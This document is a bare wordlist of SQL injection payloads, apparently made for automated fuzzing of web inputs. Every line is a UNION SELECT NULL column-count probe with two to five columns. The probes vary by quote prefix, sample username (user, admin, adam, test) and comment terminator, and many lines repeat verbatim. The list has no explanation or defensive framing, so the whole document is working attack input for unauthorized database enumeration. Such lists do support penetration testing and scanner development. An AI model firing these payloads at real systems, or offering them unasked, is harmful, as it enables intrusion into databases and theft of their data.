' UNION SELECT NULL,NULL#
' UNION SELECT NULL,NULL;
' UNION SELECT NULL,NULL;#
' UNION SELECT NULL,NULL/*
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL-- -;
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL#
' UNION SELECT NULL,NULL;
' UNION SELECT NULL,NULL;#
' UNION SELECT NULL,NULL/*
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL-- -;
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL#
' UNION SELECT NULL,NULL;
' UNION SELECT NULL,NULL;#
' UNION SELECT NULL,NULL/*
" UNION SELECT NULL,NULL--
" UNION SELECT NULL,NULL-- -;
" UNION SELECT NULL,NULL-- -
" UNION SELECT NULL,NULL#
" UNION SELECT NULL,NULL;
" UNION SELECT NULL,NULL;#
" UNION SELECT NULL,NULL/*
" UNION SELECT NULL,NULL--
" UNION SELECT NULL,NULL-- -;
" UNION SELECT NULL,NULL-- -
" UNION SELECT NULL,NULL#
" UNION SELECT NULL,NULL;
" UNION SELECT NULL,NULL;#
" UNION SELECT NULL,NULL/*
" UNION SELECT NULL,NULL--
" UNION SELECT NULL,NULL-- -;
" UNION SELECT NULL,NULL-- -
" UNION SELECT NULL,NULL#
" UNION SELECT NULL,NULL;
" UNION SELECT NULL,NULL;#
" UNION SELECT NULL,NULL/*
" UNION SELECT NULL,NULL--
" UNION SELECT NULL,NULL-- -;
" UNION SELECT NULL,NULL-- -
" UNION SELECT NULL,NULL#
" UNION SELECT NULL,NULL;
" UNION SELECT NULL,NULL;#
" UNION SELECT NULL,NULL/*
user" UNION SELECT NULL,NULL--
user" UNION SELECT NULL,NULL-- -;
user" UNION SELECT NULL,NULL-- -
user" UNION SELECT NULL,NULL#
user" UNION SELECT NULL,NULL;
user" UNION SELECT NULL,NULL;#
user" UNION SELECT NULL,NULL/*
admin" UNION SELECT NULL,NULL--
admin" UNION SELECT NULL,NULL-- -;
admin" UNION SELECT NULL,NULL-- -
admin" UNION SELECT NULL,NULL#
admin" UNION SELECT NULL,NULL;
admin" UNION SELECT NULL,NULL;#
admin" UNION SELECT NULL,NULL/*
adam" UNION SELECT NULL,NULL--
adam" UNION SELECT NULL,NULL-- -;
adam" UNION SELECT NULL,NULL-- -
adam" UNION SELECT NULL,NULL#
adam" UNION SELECT NULL,NULL;
adam" UNION SELECT NULL,NULL;#
adam" UNION SELECT NULL,NULL/*
test" UNION SELECT NULL,NULL--
test" UNION SELECT NULL,NULL-- -;
test" UNION SELECT NULL,NULL-- -
test" UNION SELECT NULL,NULL#
test" UNION SELECT NULL,NULL;
test" UNION SELECT NULL,NULL;#
test" UNION SELECT NULL,NULL/*
user' UNION SELECT NULL,NULL--
user' UNION SELECT NULL,NULL-- -;
user' UNION SELECT NULL,NULL-- -
user' UNION SELECT NULL,NULL#
user' UNION SELECT NULL,NULL;
user' UNION SELECT NULL,NULL;#
user' UNION SELECT NULL,NULL/*
admin' UNION SELECT NULL,NULL--
admin' UNION SELECT NULL,NULL-- -;
admin' UNION SELECT NULL,NULL-- -
admin' UNION SELECT NULL,NULL#
admin' UNION SELECT NULL,NULL;
admin' UNION SELECT NULL,NULL;#
admin' UNION SELECT NULL,NULL/*
adam' UNION SELECT NULL,NULL--
adam' UNION SELECT NULL,NULL-- -;
adam' UNION SELECT NULL,NULL-- -
adam' UNION SELECT NULL,NULL#
adam' UNION SELECT NULL,NULL;
adam' UNION SELECT NULL,NULL;#
adam' UNION SELECT NULL,NULL/*
test' UNION SELECT NULL,NULL--
test' UNION SELECT NULL,NULL-- -;
test' UNION SELECT NULL,NULL-- -
test' UNION SELECT NULL,NULL#
test' UNION SELECT NULL,NULL;
test' UNION SELECT NULL,NULL;#
test' UNION SELECT NULL,NULL/*
user UNION SELECT NULL,NULL--
user UNION SELECT NULL,NULL-- -;
user UNION SELECT NULL,NULL-- -
user UNION SELECT NULL,NULL#
user UNION SELECT NULL,NULL;
user UNION SELECT NULL,NULL;#
user UNION SELECT NULL,NULL/*
admin UNION SELECT NULL,NULL--
admin UNION SELECT NULL,NULL-- -;
admin UNION SELECT NULL,NULL-- -
admin UNION SELECT NULL,NULL#
admin UNION SELECT NULL,NULL;
admin UNION SELECT NULL,NULL;#
admin UNION SELECT NULL,NULL/*
adam UNION SELECT NULL,NULL--
adam UNION SELECT NULL,NULL-- -;
adam UNION SELECT NULL,NULL-- -
adam UNION SELECT NULL,NULL#
adam UNION SELECT NULL,NULL;
adam UNION SELECT NULL,NULL;#
adam UNION SELECT NULL,NULL/*
test UNION SELECT NULL,NULL--
test UNION SELECT NULL,NULL-- -;
test UNION SELECT NULL,NULL-- -
test UNION SELECT NULL,NULL#
test UNION SELECT NULL,NULL;
test UNION SELECT NULL,NULL;#
test UNION SELECT NULL,NULL/*
 UNION SELECT NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL/*
user" UNION SELECT NULL,NULL,NULL--
user" UNION SELECT NULL,NULL,NULL-- -;
user" UNION SELECT NULL,NULL,NULL-- -
user" UNION SELECT NULL,NULL,NULL#
user" UNION SELECT NULL,NULL,NULL;
user" UNION SELECT NULL,NULL,NULL;#
user" UNION SELECT NULL,NULL,NULL/*
admin" UNION SELECT NULL,NULL,NULL--
admin" UNION SELECT NULL,NULL,NULL-- -;
admin" UNION SELECT NULL,NULL,NULL-- -
admin" UNION SELECT NULL,NULL,NULL#
admin" UNION SELECT NULL,NULL,NULL;
admin" UNION SELECT NULL,NULL,NULL;#
admin" UNION SELECT NULL,NULL,NULL/*
adam" UNION SELECT NULL,NULL,NULL--
adam" UNION SELECT NULL,NULL,NULL-- -;
adam" UNION SELECT NULL,NULL,NULL-- -
adam" UNION SELECT NULL,NULL,NULL#
adam" UNION SELECT NULL,NULL,NULL;
adam" UNION SELECT NULL,NULL,NULL;#
adam" UNION SELECT NULL,NULL,NULL/*
test" UNION SELECT NULL,NULL,NULL--
test" UNION SELECT NULL,NULL,NULL-- -;
test" UNION SELECT NULL,NULL,NULL-- -
test" UNION SELECT NULL,NULL,NULL#
test" UNION SELECT NULL,NULL,NULL;
test" UNION SELECT NULL,NULL,NULL;#
test" UNION SELECT NULL,NULL,NULL/*
user' UNION SELECT NULL,NULL,NULL--
user' UNION SELECT NULL,NULL,NULL-- -;
user' UNION SELECT NULL,NULL,NULL-- -
user' UNION SELECT NULL,NULL,NULL#
user' UNION SELECT NULL,NULL,NULL;
user' UNION SELECT NULL,NULL,NULL;#
user' UNION SELECT NULL,NULL,NULL/*
admin' UNION SELECT NULL,NULL,NULL--
admin' UNION SELECT NULL,NULL,NULL-- -;
admin' UNION SELECT NULL,NULL,NULL-- -
admin' UNION SELECT NULL,NULL,NULL#
admin' UNION SELECT NULL,NULL,NULL;
admin' UNION SELECT NULL,NULL,NULL;#
admin' UNION SELECT NULL,NULL,NULL/*
adam' UNION SELECT NULL,NULL,NULL--
adam' UNION SELECT NULL,NULL,NULL-- -;
adam' UNION SELECT NULL,NULL,NULL-- -
adam' UNION SELECT NULL,NULL,NULL#
adam' UNION SELECT NULL,NULL,NULL;
adam' UNION SELECT NULL,NULL,NULL;#
adam' UNION SELECT NULL,NULL,NULL/*
test' UNION SELECT NULL,NULL,NULL--
test' UNION SELECT NULL,NULL,NULL-- -;
test' UNION SELECT NULL,NULL,NULL-- -
test' UNION SELECT NULL,NULL,NULL#
test' UNION SELECT NULL,NULL,NULL;
test' UNION SELECT NULL,NULL,NULL;#
test' UNION SELECT NULL,NULL,NULL/*
user UNION SELECT NULL,NULL,NULL--
user UNION SELECT NULL,NULL,NULL-- -;
user UNION SELECT NULL,NULL,NULL-- -
user UNION SELECT NULL,NULL,NULL#
user UNION SELECT NULL,NULL,NULL;
user UNION SELECT NULL,NULL,NULL;#
user UNION SELECT NULL,NULL,NULL/*
admin UNION SELECT NULL,NULL,NULL--
admin UNION SELECT NULL,NULL,NULL-- -;
admin UNION SELECT NULL,NULL,NULL-- -
admin UNION SELECT NULL,NULL,NULL#
admin UNION SELECT NULL,NULL,NULL;
admin UNION SELECT NULL,NULL,NULL;#
admin UNION SELECT NULL,NULL,NULL/*
adam UNION SELECT NULL,NULL,NULL--
adam UNION SELECT NULL,NULL,NULL-- -;
adam UNION SELECT NULL,NULL,NULL-- -
adam UNION SELECT NULL,NULL,NULL#
adam UNION SELECT NULL,NULL,NULL;
adam UNION SELECT NULL,NULL,NULL;#
adam UNION SELECT NULL,NULL,NULL/*
test UNION SELECT NULL,NULL,NULL--
test UNION SELECT NULL,NULL,NULL-- -;
test UNION SELECT NULL,NULL,NULL-- -
test UNION SELECT NULL,NULL,NULL#
test UNION SELECT NULL,NULL,NULL;
test UNION SELECT NULL,NULL,NULL;#
test UNION SELECT NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL/*
user" UNION SELECT NULL,NULL,NULL,NULL--
user" UNION SELECT NULL,NULL,NULL,NULL-- -;
user" UNION SELECT NULL,NULL,NULL,NULL-- -
user" UNION SELECT NULL,NULL,NULL,NULL#
user" UNION SELECT NULL,NULL,NULL,NULL;
user" UNION SELECT NULL,NULL,NULL,NULL;#
user" UNION SELECT NULL,NULL,NULL,NULL/*
admin" UNION SELECT NULL,NULL,NULL,NULL--
admin" UNION SELECT NULL,NULL,NULL,NULL-- -;
admin" UNION SELECT NULL,NULL,NULL,NULL-- -
admin" UNION SELECT NULL,NULL,NULL,NULL#
admin" UNION SELECT NULL,NULL,NULL,NULL;
admin" UNION SELECT NULL,NULL,NULL,NULL;#
admin" UNION SELECT NULL,NULL,NULL,NULL/*
adam" UNION SELECT NULL,NULL,NULL,NULL--
adam" UNION SELECT NULL,NULL,NULL,NULL-- -;
adam" UNION SELECT NULL,NULL,NULL,NULL-- -
adam" UNION SELECT NULL,NULL,NULL,NULL#
adam" UNION SELECT NULL,NULL,NULL,NULL;
adam" UNION SELECT NULL,NULL,NULL,NULL;#
adam" UNION SELECT NULL,NULL,NULL,NULL/*
test" UNION SELECT NULL,NULL,NULL,NULL--
test" UNION SELECT NULL,NULL,NULL,NULL-- -;
test" UNION SELECT NULL,NULL,NULL,NULL-- -
test" UNION SELECT NULL,NULL,NULL,NULL#
test" UNION SELECT NULL,NULL,NULL,NULL;
test" UNION SELECT NULL,NULL,NULL,NULL;#
test" UNION SELECT NULL,NULL,NULL,NULL/*
user' UNION SELECT NULL,NULL,NULL,NULL--
user' UNION SELECT NULL,NULL,NULL,NULL-- -;
user' UNION SELECT NULL,NULL,NULL,NULL-- -
user' UNION SELECT NULL,NULL,NULL,NULL#
user' UNION SELECT NULL,NULL,NULL,NULL;
user' UNION SELECT NULL,NULL,NULL,NULL;#
user' UNION SELECT NULL,NULL,NULL,NULL/*
admin' UNION SELECT NULL,NULL,NULL,NULL--
admin' UNION SELECT NULL,NULL,NULL,NULL-- -;
admin' UNION SELECT NULL,NULL,NULL,NULL-- -
admin' UNION SELECT NULL,NULL,NULL,NULL#
admin' UNION SELECT NULL,NULL,NULL,NULL;
admin' UNION SELECT NULL,NULL,NULL,NULL;#
admin' UNION SELECT NULL,NULL,NULL,NULL/*
adam' UNION SELECT NULL,NULL,NULL,NULL--
adam' UNION SELECT NULL,NULL,NULL,NULL-- -;
adam' UNION SELECT NULL,NULL,NULL,NULL-- -
adam' UNION SELECT NULL,NULL,NULL,NULL#
adam' UNION SELECT NULL,NULL,NULL,NULL;
adam' UNION SELECT NULL,NULL,NULL,NULL;#
adam' UNION SELECT NULL,NULL,NULL,NULL/*
test' UNION SELECT NULL,NULL,NULL,NULL--
test' UNION SELECT NULL,NULL,NULL,NULL-- -;
test' UNION SELECT NULL,NULL,NULL,NULL-- -
test' UNION SELECT NULL,NULL,NULL,NULL#
test' UNION SELECT NULL,NULL,NULL,NULL;
test' UNION SELECT NULL,NULL,NULL,NULL;#
test' UNION SELECT NULL,NULL,NULL,NULL/*
user UNION SELECT NULL,NULL,NULL,NULL--
user UNION SELECT NULL,NULL,NULL,NULL-- -;
user UNION SELECT NULL,NULL,NULL,NULL-- -
user UNION SELECT NULL,NULL,NULL,NULL#
user UNION SELECT NULL,NULL,NULL,NULL;
user UNION SELECT NULL,NULL,NULL,NULL;#
user UNION SELECT NULL,NULL,NULL,NULL/*
admin UNION SELECT NULL,NULL,NULL,NULL--
admin UNION SELECT NULL,NULL,NULL,NULL-- -;
admin UNION SELECT NULL,NULL,NULL,NULL-- -
admin UNION SELECT NULL,NULL,NULL,NULL#
admin UNION SELECT NULL,NULL,NULL,NULL;
admin UNION SELECT NULL,NULL,NULL,NULL;#
admin UNION SELECT NULL,NULL,NULL,NULL/*
adam UNION SELECT NULL,NULL,NULL,NULL--
adam UNION SELECT NULL,NULL,NULL,NULL-- -;
adam UNION SELECT NULL,NULL,NULL,NULL-- -
adam UNION SELECT NULL,NULL,NULL,NULL#
adam UNION SELECT NULL,NULL,NULL,NULL;
adam UNION SELECT NULL,NULL,NULL,NULL;#
adam UNION SELECT NULL,NULL,NULL,NULL/*
test UNION SELECT NULL,NULL,NULL,NULL--
test UNION SELECT NULL,NULL,NULL,NULL-- -;
test UNION SELECT NULL,NULL,NULL,NULL-- -
test UNION SELECT NULL,NULL,NULL,NULL#
test UNION SELECT NULL,NULL,NULL,NULL;
test UNION SELECT NULL,NULL,NULL,NULL;#
test UNION SELECT NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
user" UNION SELECT NULL,NULL,NULL,NULL,NULL--
user" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
user" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
user" UNION SELECT NULL,NULL,NULL,NULL,NULL#
user" UNION SELECT NULL,NULL,NULL,NULL,NULL;
user" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
user" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL--
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL#
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL;
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL--
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL#
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL;
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
test" UNION SELECT NULL,NULL,NULL,NULL,NULL--
test" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
test" UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
test" UNION SELECT NULL,NULL,NULL,NULL,NULL#
test" UNION SELECT NULL,NULL,NULL,NULL,NULL;
test" UNION SELECT NULL,NULL,NULL,NULL,NULL;#
test" UNION SELECT NULL,NULL,NULL,NULL,NULL/*
user' UNION SELECT NULL,NULL,NULL,NULL,NULL--
user' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
user' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
user' UNION SELECT NULL,NULL,NULL,NULL,NULL#
user' UNION SELECT NULL,NULL,NULL,NULL,NULL;
user' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
user' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL--
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL#
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL;
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL--
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL#
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL;
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
test' UNION SELECT NULL,NULL,NULL,NULL,NULL--
test' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
test' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
test' UNION SELECT NULL,NULL,NULL,NULL,NULL#
test' UNION SELECT NULL,NULL,NULL,NULL,NULL;
test' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
test' UNION SELECT NULL,NULL,NULL,NULL,NULL/*
